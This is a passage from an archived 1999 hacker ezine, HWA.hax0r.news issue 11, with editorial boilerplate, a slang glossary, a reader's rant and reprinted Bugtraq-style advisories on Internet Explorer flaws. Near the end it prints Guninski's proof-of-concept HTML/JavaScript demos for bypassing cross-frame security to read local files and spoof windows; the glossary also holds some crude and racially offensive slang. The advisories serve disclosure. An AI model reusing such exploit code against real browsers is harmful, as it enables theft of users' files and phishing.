💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › HWA › hwa-hn11.… captured on 2021-12-03 at 14:04:38.
-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99=] Number 11 Volume 1 1999 March 24th 99 ========================================================================== Anyone want to send in comments on the current site or ideas for a new site layout, please do so, i'm no html wizard and all my sites tend to end up looking pretty much the same, if you feel creative and want to put a demo site together or point me in the direction of a site layout you like please do so, i'm getting bored with the haphazard layout of the current site and could use some creative input on ideas for layout as its a bit crowded currently and only looks half decent in 1024x768 mode .... tnx - cruciphux@dok.org Synopsis -------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... <g> @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... #11 =-----------------------------------------------------------------------= ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** *** *** *** please join to discuss or impart news on techno/phac scene *** *** stuff or just to hang out ... someone is usually around 24/7*** *** *** *** Note that the channel isn't there to entertain you its for *** *** you to talk to us and impart news, if you're looking for fun*** *** then do NOT join our channel try #wierdwigs or something... *** *** we're not #chatzone or #hack *** *** *** ******************************************************************* =-------------------------------------------------------------------------= Issue #11 =--------------------------------------------------------------------------= [ INDEX ] =--------------------------------------------------------------------------= Key Content =--------------------------------------------------------------------------= 00.0 .. COPYRIGHTS ...................................................... 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. SOURCES ......................................................... 00.3 .. THIS IS WHO WE ARE .............................................. 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?.......................... 00.5 .. THE HWA_FAQ V1.0 ................................................ 01.0 .. GREETS .......................................................... 01.1 .. Last minute stuff, rumours, newsbytes ........................... 01.2 .. Mailbag ......................................................... 02.0 .. From the editor.................................................. =--------------------------------------------------------------------------= 03.0 .. MSIE 5 is still susceptible to frame spoofing and other bugs..... 03.1 .. MSIE 5 problems carried over from earlier versions.............. 04.0 .. WintrasherGOLD................................................... 05.0 .. LDAP Buffer overflow............................................. 06.0 .. HP security bulletin: HPTerm exploit............................. 07.0 .. Eudora buffer overflow exploit................................... 08.0 .. Netscape SUSE crash exploit...................................... 09.0 .. Hotmail to fix potential security problem ....................... 10.0 .. NcFTPd Exploit (from Feb but missed in earlier issues)........... 10.1 .. NcFTPd proxy exploitation....................................... 10.2 .. Mail.local sendmail exploit advisory............................ 11.0 .. Its in the bag, much ado about nothing .......................... 12.0 .. [ISN] DNS Spoofing finally resolved?............................. 13.0 .. [ISN] IETF working group seeks to improve security alerting .... 14.0 .. Report: Military computers vulnerable............................ 15.0 .. International raid cracks child porn ring ....................... 15.1 .. ACPM : Anti-Child Porn Militia wants YOU........................ 16.0 .. Hacking (Cracking) contest, win a Netfinity server!.............. 17.0 .. eBay owned....................................................... 18.0 .. Aussies to ban Net pr0n.......................................... 19.0 .. More on the ProMail email trojan program ........................ 20.0 .. C41 - Pentagon�s cyberdefenses criticized........................ 21.0 .. [ISN] NetBus 'Trojan' Splits Security Community.................. 22.0 .. [ISN] Cracking tools get smarter ................................ 23.0 .. [ISN] British Defense Ministry Dismisses Hacker Report........... 24.0 .. [ISN] Encryption key would lock up criminals..................... 25.0 .. [ISN] Crypto: Under lock and key ................................ 26.0 .. HRC's interview with Goat Security (IRC LOG)..................... 27.0 .. Year 2000 Network and Distributed System Security ............... 28.0 .. What would YOU do with Bill Gates' SSN?.......................... 29.0 .. MDT monitoring (Mobile Data Terminal as used by the Police)...... 30.0 .. Bugtraq: Lotus notes security advisory........................... 31.1 .. WU-FTPD REMOTE EXPLOIT Version wu-2.4.2-academ[BETA-18](1)....... 32.0 .. Bugtraq: OpenSSL and SSLeay Advisory............................. 33.0 .. OpenBSD security advisories...................................... 34.0 .. Oracle in insecure at initial install............................ 35.0 .. GnuPlot buffer overflow exploit ................................. =--------------------------------------------------------------------------= AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. .......................................................................... HA.HA .. Humour and puzzles ............................................ HA.HA1 .. Humourous newsbytes from Innerpulse.com (www.innerpulse.com). .......................................................................... HOW.TO .. New section: "How to hack" by our illustrious editor part 2..... SITE.1 .. Featured site, http://www.real-secure.org/ with ezine excerpt... on IP Spoofing ................................................. .......................................................................... H.W .. Hacked Websites .............................................. A.0 .. APPENDICES...................................................... A.1 .. PHACVW linx and references...................................... =--------------------------------------------------------------------------= @HWA'99 "Heh heh heh heh heh,.why don't you listen to this recording with interest? Mary Mary, kill the hairy sonuvabitch...he he he and now for something completely different" - Wierdmix'90 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. cruciphux@dok.org Cruciphux [C*:.] 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Has it occurred to anybody that "AOL for Dummies" is an extremely redundant name for a book? - unknown Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are ~~~~~~~ reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) ;-) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. <g> - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. If you still can't think of anything you're probably not that interesting a person after all so don't worry about it <BeG> Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas72@usa.net @HWA 00.2 Sources *** ~~~~~~~~~~~ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. HiR:Hackers Information Report... http://axon.jccc.net/hir/ News & I/O zine ................. http://www.antionline.com/ Back Orifice/cDc..................http://www.cultdeadcow.com/ News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ ...............http://www.l0pht.com/ NewsTrolls (HNN)..................http://www.newstrolls.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD ..............................http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ News site+........................http://www.gammaforce.org/ News site+........................http://www.projectgamma.com/ +Various mailing lists and some newsgroups, such as ... +other sites available on the HNN affiliates page, please see http://www.hackernews.com/affiliates.html as they seem to be popping up rather frequently ... * Yes demoniz is now officially retired, if you go to that site though the Bikkel web board (as of this writing) is STILL ACTIVE, www.hwa-iwa.org will also be hosting a webboard as soon as that site comes online perhaps you can visit it and check us out if I can get some decent wwwboard code running I don't really want to write my own, another alternative being considered is a telnet bbs that will be semi-open to all, you will be kept posted. - cruciphux http://www.the-project.org/ .. IRC list/admin archives http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk alt.hackers.malicious alt.hackers alt.2600 BUGTRAQ ISN security mailing list ntbugtraq <+others> NEWS Agencies, News search engines etc: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.cnn.com/SEARCH/ http://www.foxnews.com/search/cgi-bin/search.cgi?query=cracker&days=0&wires=0&startwire=0 http://www.news.com/Searching/Results/1,18,1,00.html?querystr=cracker http://www.ottawacitizen.com/business/ http://search.yahoo.com.sg/search/news_sg?p=cracker http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=cracker http://www.zdnet.com/zdtv/cybercrime/ http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) NOTE: See appendices for details on other links. http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm http://freespeech.org/eua/ Electronic Underground Affiliation http://www.l0pht.com/cyberul.html http://www.hackernews.com/archive.html?122998.html http://ech0.cjb.net ech0 Security http://net-security.org Net Security ... Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.� To unsubscribe, visit http://www.counterpane.com/unsubform.html.� Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.� Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.� He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.� He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest��� Sun� 14 Feb, 1999�� Volume 11 : Issue 09 ����� ��������������������� ISSN� 1004-042X ������ Editor: Jim Thomas (cudigest@sun.soci.niu.edu) ������ News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu) ������ Archivist: Brendan Kehoe ������ Poof Reader:�� Etaion Shrdlu, Jr. ������ Shadow-Archivists: Dan Carosone / Paul Southworth ������������������������� Ralph Sims / Jyrki Kuoppala ������������������������� Ian Dickinson ������ Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed Subscribe: mail majordomo@repsec.com with "subscribe isn". @HWA 00.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/IRC+ man in black sas72@usa.net ............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black Foreign Correspondants/affiliate members ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ATTENTION: All foreign correspondants please check in or be removed by next issue I need your current emails since contact info was recently lost in a HD mishap and i'm not carrying any deadweight. Plus we need more people sending in info, my apologies for not getting back to you if you sent in January I lost it, please resend. N0Portz ..........................: Australia Qubik ............................: United Kingdom system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland And unofficially yet contributing too much to ignore ;) Spikeman .........................: World media Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site Contributors to this issue: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Spikeman .........................: daily news updates+ ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 00.4 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Can I see you naked?" - Bob Barker Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' <see article in issue #4> this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type wierd crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same <coff> Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking <software> C - Cracking <systems hacking> V - Virus W - Warfare <cyberwarfare usually as in Jihad> CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" <sic> 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. @HWA -=- :. .: -=- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. Shouts to: * Kevin Mitnick * demoniz * The l0pht crew * tattooman * Dicentra * Pyra * Vexxation * FProphet * TwistedP * NeMstah * the readers * mj * Kokey * ypwitch * kimmie * tsal * spikeman * YOU. * #leetchans ppl, you know who you are... * all the people who sent in cool emails and support * our new 'staff' members. kewl sites: + http://www.freshmeat.net/ + http://www.slashdot.org/ + http://www.l0pht.com/ + http://www.2600.com/ + http://hacknews.bikkel.com/ (http://www.bikkel.com/~demoniz/) + http://www.legions.org/ + http://www.genocide2600.com/ + http://www.genocide2600.com/~spikeman/ + http://www.genocide2600.com/~tattooman/ + http://www.hackernews.com/ (Went online same time we started issue 1!) @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? ++ Attrition has updated its archive of cracked sites with one of the biggest archives on the net http://www.attrition.org check it out ... Mucho thanks to Spikeman for directing his efforts to our cause of bringing you the news we want to read about in a timely manner ... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Yes we really do get a pile of mail in case you were wondering ;-0 heres a sampling of some of the mail we get here, the more interesting ones are included and of course we had to get in the plugs for the zine coz we love to receive those too *G* - Ed This is "off-topic" but its something I thought i'd share with the readers if you have any comments on the writing i'd like to hear them and so would phiregod so give us an email, we need more writers like this to bring a dose of reality to our lives now and then... - Cruciphux@dok.org From: "liquid phire" <liquidphire@hotmail.com> To: cruciphux@dok.org Subject: a new one Date: Tue, 23 Mar 1999 19:04:34 PST Mime-Version: 1.0 Content-type: text/plain <snip> when i watch tv all i see are commercials for heartburn stuffs, what is with that? are the subjects of american culture rotting from the inside out? did their bodies realize their sins before their minds did? is this happening with everyone? the world is going downhill fast, and we wont find out until we hit the bottom whether or not our air bags will work. this is a new car commercial, gaudy and loud, "buy or die!" they scream from their tabloid pulpits. our churches have turned into department stores, the very children that are our hope are selling their lives out for a dime bag and a place to stay. we dress in jail rags, chant the rants of the very people that are bringing this psuedo-life to its knees. athletes are yelling the rhymes of corporations at anyone who will listen. our heros are not fighting for equality or freedom, they are throwing hype out about cop killers and hits of coke. you cant eat money, you cant take it with you when you die, and it sure as hell wont stop a bullet. america is the prostitute of the free and imprisoned world, thousands died so we can enjoy cable from our matching houses with our matching lives. god is for those who are wasting their lives and need another one to spare. we fought for what now? so that rapists and murderers could walk free while political prisoners rotted in their cells? parents work all day so their children can attend public schools that promote insecurity and train the next generation to be faceless and money driven. the smart are encouraged to work for large companies or military services, the down of luck are pushed into low paying jobs and inferior lives. the country will prosper and a revolution will be breathing down our necks. i missed the sermon with the explanation, the end is near and the lord saves. mc donalds will cater the apocalypse, and nike will provide the offical shoe. god sold out to miramax for the film, tarantino has claimed the screenplay, and look out for the soundtrack by backstreet boys. salvation is being sold with an order of fries, healing comes with a free drink, faith by armani. the angels have encountered a glass ceiling, sexual harassment allegations in hell, the government has become "nightly action news". blood and gore, right and wrong, good and bad, pleasure and pain extremes are desired in a moderated world. the second coming will have its own line of clothes, the blood of the lamb is copyrighted. heaven and the inferno have merged and the NASDAQ is reaching all time highs. justice has been fucked over, her sword carried off and her measures used for heroin. the flag is used as a doormat in other countries, our anthem sung by drunk veterans in the middle of the night. this feels like a moment of revelation, but its just another day in Las Vegas. i wake up in the middle of the night screaming for solace, i cry for a calm sea and a worthy ship. like a panther truth runs through the sleeping city, merging with the gray and spreading over the streets in lies. we are grasping ever bit of cabbie wisdom we can find, slipping over the edge trying to hold on to religion, government, and "family". we have a thirst that encompasses our lives, and it can only be quenched with blood. "i am the alpha and the omega, the begining and the end." i dont remember if it was jesus or bill gates that said that. please excuse all grammer/spelling mistakes. phiregod liquidphire@hotmail.com www.geocities.com/siliconvalley/sector/4121 Get Your Private, Free Email at http://www.hotmail.com ================================================================ @HWA 02.0 From the editor.#9 ~~~~~~~~~~~~~~~~~~ #include <stdio.h> #include <thoughts.h> #include <backup.h> main() { printf ("Read commented source!\n\n"); /* *So Mircosoft continues to suck, the released IE5 (wooHOO) *and whaddya know it still has a slew of bugs duh...all those *frame spewfing bugs and other java monsters are still in there *so I hope u guys that keep hitting the site with MSIE will *begin to smarten up and see that Netscape although not the *most secure program either is a damn sight better than MSIE *even on a bad day ... peace out rockin with issue 11 * */ printf ("EoF.\n"); } Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. @HWA 03.0 MSIE 5 is still susceptible to frame spoofing and other bugs ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Fri, 19 Mar 1999 11:46:01 +0100 From: Most Psychoid <psychoid@GMX.NET> To: BUGTRAQ@netspace.org Subject: IE5 - same vulnerabilities, only some fixed Hello, The new Microsoft Internet Explorer 5 (I checked Version: 5.00.0910.1309) still allows Frame Spoofing and reading of local Files as described by Georgi Guninski (see http://www.whitehats.com/guninski/read.html). Another new feature named "AutoComplete" stores entries (which also may be passwords). Just another new source for passwords which had not been saved in IE 4.x. The Crash-bugs seem to be removed. I could not crash my default installed IE 5 using the known exploits. So far, psychoid --- Sent through Global Message Exchange - http://www.gmx.net 03.1 MSIE 5 problems carried over from earlier versions ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ There is a Javascript security bug in Internet Explorer 4.x (patched), which circumvents "Cross-frame security" and opens several security holes. The problem is: if you add '%01someURL' after an 'about:somecode' URL, IE thinks that the document is loaded from the domain of 'someURL'. Very strange? Some of the bugs are: 1) IE allows reading local files and sending them to an arbitrary server. The filename must be known. The bug may be exploited using HTML mail message. Demo is available (See Demos below) 2) IE allows "window spoofing". After visiting a hostile page (or clicking a hostile link) a window is opened and its location is a trusted site. However, the content of the window is not that of the original site, but it is supplied by the owner of the page. So, the user is misled he is browising a trusted site, while he is browsing a hostile page and may provide sensitive information, such as credit card number. The bug may be exploited using HTML mail message. Demo is available (See below) 3) Reading AUTOEXEC.BAT using TDC. Demo is available: (See below) Workaround: Disable Javascript Demo #1 <HTML> <HEAD><TITLE> Guninski's IE 4 file reading bug. </TITLE> </HEAD> <BODY> There is a bug in Internet Explorer 4.x (patched) which allows reading local files and sending them to an arbitrary server. <BR> The problem is: if you add '%01someURL' after the URL, IE thinks that the document is loaded from the domain of 'someURL'. <BR> This circumvents "Cross-frame security" and opens several security holes. <BR> The filename must be known. <BR> The bug may be exploited using HTML mail message. The exploit uses Javascript. For more info see the source. <BR> Workaround: Disable Javascript. <BR> <SCRIPT> alert('Create a short file C:\\test.txt and its contents will be shown in a dialog box.') b=showModalDialog("about:<SCRIPT>a=window.open('file://c:/test.txt');s='Here is your file: \\n\\n'+a.document.body.innerText;alert(s);a.close();close()</"+"SCRIPT>%01file://c:/"); </SCRIPT> <A HREF="http://www.whitehats.com/guninski">Go to Georgi Guninski's home page.</A> </BODY> </HTML> Demo #2 <HTML> <HEAD><TITLE> Guninski's IE 4 window spoofing. </TITLE> </HEAD> <BODY> There is a bug in Internet Explorer 4.x (patched) which allows "window spoofing". <BR> The problem is: if you add '%01someURL' after the URL, IE thinks that the document is loaded from the domain of 'someURL'. <BR> This circumvents "Cross-frame security" and opens several security holes. <BR> <BR> After visiting a hostile page (or clicking a hostile link) a window is opened and its location is a trusted site. However, the content of the window is not that of the original site, but it is supplied by the owner of the page. So, the user is mislead he is browising a trusted site, while he is browsing a hostile page and may provide sensitive information, such as credit card number. <BR> The bug may be exploited using HTML mail message. The exploit uses Javascript. <BR> Workaround: Disable Javascript. <BR> <SCRIPT> alert('A window will be open. Examine the location and the content.\nThis may also be done by clicking a link.') b=showModalDialog("about:<SCRIPT>a=window.open('http://www.yahoo.com');a.document.write('<HTML><HEAD><TITLE>Yahoo</TITLE><BODY></HEAD><H1>Look at the address bar!<BR>');a.document.write('<A HREF=\"http://www.whitehats.com/guninski\">Go to Georgi Guninski\\'s home 